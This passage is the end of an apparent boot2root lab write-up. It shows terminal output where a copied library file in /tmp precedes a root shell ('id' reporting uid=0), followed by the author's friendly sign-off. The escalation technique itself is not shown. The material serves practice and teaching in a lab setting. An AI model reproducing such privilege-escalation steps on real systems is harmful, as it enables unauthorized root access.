cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2# id
uid=0(root) gid=0(root) groups=48(apache)


EOL

Thank you for hanging around for this boot2root! I learned quite a bit working through this machine and I hope you did as well in your attempt.
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!